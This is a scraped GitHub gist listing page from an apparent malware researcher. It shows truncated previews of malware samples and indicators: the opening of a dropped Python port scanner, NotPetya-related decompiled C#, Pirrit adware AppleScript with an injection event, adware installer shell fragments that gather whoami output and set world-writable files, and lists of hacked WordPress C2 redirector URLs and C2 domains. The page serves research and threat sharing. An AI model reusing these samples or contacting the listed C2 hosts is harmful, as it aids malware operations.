Skip to content

Instantly share code, notes, and snippets.

Avatar

Amit Serper aserper

View GitHub Profile
View gist:e36d382668c6cf2c996c5143025097c0
AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
@aserper
aserper / dropped_port_scanner.py
Created Jun 13, 2019
dropped python portscanner
View dropped_port_scanner.py
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
import os
from random import randrange
import random
@aserper
aserper / gist:cbcd0c8ecbda9398911ecaa1c7f2f71b
Created Mar 8, 2019
Hacked wordpress domains used as a C2 redirector
View gist:cbcd0c8ecbda9398911ecaa1c7f2f71b
http://printofcenter.pl/media/system/info.php?url=
http://printofcenter.pl/media/system/log.php?url=
http://moippo.org.ua/media/system/log.php?url=
http://moippo.org.ua/media/system/info.php?url=
http://nihir.org/wp-includes/rest-api/info.php?url=
http://nihir.org/wp-includes/rest-api/log.php?url=
http://airsoft.monokpeti.xyz/wp-includes/js/log.php?url=
http://airsoft.monokpeti.xyz/wp-includes/js/info.php?url=
http://asoftel.east.3cx.us/wp-includes/js/log.php?url=
http://asoftel.east.3cx.us/wp-includes/js/info.php?url=
@aserper
aserper / gist:d0f1f2eb66b582ca04f195707a8d0126
Created Jul 2, 2017
Form1 from Karo. NotPetya svchost.exe
View gist:d0f1f2eb66b582ca04f195707a8d0126
using ;
using ;
using ;
using ;
using ;
using IWshRuntimeLibrary;
using SmartAssembly.Delegates;
using SmartAssembly.HouseOfCards;
using System;
using System.Collections.Generic;
@aserper
aserper / gist:43664a1daf7d309c46edc2f739d78ecd
Created May 9, 2017
domains from proton.b encrypted file
View gist:43664a1daf7d309c46edc2f739d78ecd
handbrakestore.com
handbrake.cc
luwenxdsnhgfxckcjgxvtugj.com
6gmvshjdfpfbeqktpsde5xav.com
kjfnbfhu7ndudgzhxpwnnqkc.com
yaxw8dsbttpwrwlq3h6uc9eq.com
qrtfvfysk4bdcwwwe9pxmqe9.com
fyamakgtrrjt9vrwhmc76v38.com
kcdjzquvhsua6hlfbmjzkzsb.com
ypu4vwlenkpt29f95etrqllq.com
View gist:573dcf3323b32d7ac701c3e9d6417596
61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
View pirrit_applescript
global _pid
set _pid to "pid_value_to_replace"
repeat
«event XFdrIjct» {}
end repeat
on «event XFdrIjct» {}
delay 0.5
View setup.sh
#!/bin/bash
chmod +x install_updater.sh
./install_updater.sh $6
#save current dir position
curdir=`pwd`
user=`users | cut -f1 -d' '`
#if somebody disturbs /tmp using
View gist:c71765d5efe4bc26387573f4ce9f47f2
#!/bin/sh
function offer7000 {
whoami > /var/tmp/whoami.txt
sudo whoami > /var/tmp/suwho.txt
updFile="/var/tmp/updText.txt"
touch $updFile
sudo chmod 777 $updFile
sudo whoami >> $updFile
@aserper
aserper / gist:f7961e63a89c2c0a71149544d55ee39f
Created Apr 9, 2016
OS X pirrit new configuration Applescript - DONT RUN IT
View gist:f7961e63a89c2c0a71149544d55ee39f
global _pid
set _pid to "pid_value_to_replace"
repeat
«event XFdrIjct» {}
end repeat
on «event XFdrIjct» {}
delay 0.5
You can’t perform that action at this time.